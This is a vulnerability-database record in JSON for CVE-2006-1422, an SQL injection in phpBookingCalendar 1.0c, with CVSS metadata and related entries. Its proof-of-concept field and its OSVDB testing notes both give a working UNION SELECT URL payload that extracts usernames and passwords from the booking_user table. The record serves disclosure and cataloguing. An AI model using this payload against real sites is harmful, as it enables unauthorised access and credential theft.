{"published": "2006-03-25T00:00:00", "id": "EDB-ID:1610", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "0872419cae267fa0d46b9874298c791fb719775949a33e510984799f377141cd", "description": "phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection. CVE-2006-1422. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/1610/", "lastseen": "2016-01-31T14:32:45", "edition": 1, "title": "phpBookingCalendar <= 1.0c - details_view.php Remote SQL Injection", "osvdbidlist": ["31624"], "modified": "2006-03-25T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1422"], "sourceHref": "https://www.exploit-db.com/download/1610/", "references": [], "reporter": "undefined1_", "sourceData": "PoC by undefined1_ @ bash-x.net/undef/\n\nphpBookingCalendar <= 1.0c\n\"A PHP/MySQL Booking Calendar Application.\"\nhttp://www.jjwdesign.com/booking_calendar.html\n\nphpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.\nwww.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user\n\n# milw0rm.com [2006-03-25]\n", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2006-1422", "type": "cve", "title": "CVE-2006-1422", "description": "SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the event_id parameter.", "published": "2006-03-28T15:02:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1422", "cvelist": ["CVE-2006-1422"], "lastseen": "2017-10-11T11:06:34"}], "osvdb": [{"id": "OSVDB:31624", "type": "osvdb", "title": "PHP Booking Calendar details_view.php event_id SQL Injection", "description": "## Manual Testing Notes\nhttp://[target]/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user\n## References:\nVendor URL: http://www.jjwdesign.com/booking_calendar.html\nISS X-Force ID: 25580\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1610\n[CVE-2006-1422](https://vulners.com/cve/CVE-2006-1422)\nBugtraq ID: 17230\n", "published": "2006-03-25T21:38:21", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:31624", "cvelist": ["CVE-2006-1422"], "lastseen": "2017-04-28T13:20:28"}], "exploitdb": [{"id": "EDB-ID:5696", "type": "exploitdb", "title": "PHP Booking Calendar 10 d Remote SQL Injection Exploit", "description": "PHP Booking Calendar 10 d Remote SQL Injection Exploit. CVE-2006-1422. Webapps exploit for php platform", "published": "2008-05-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/5696/", "cvelist": ["CVE-2006-1422"], "lastseen": "2016-01-31T22:27:17"}]}}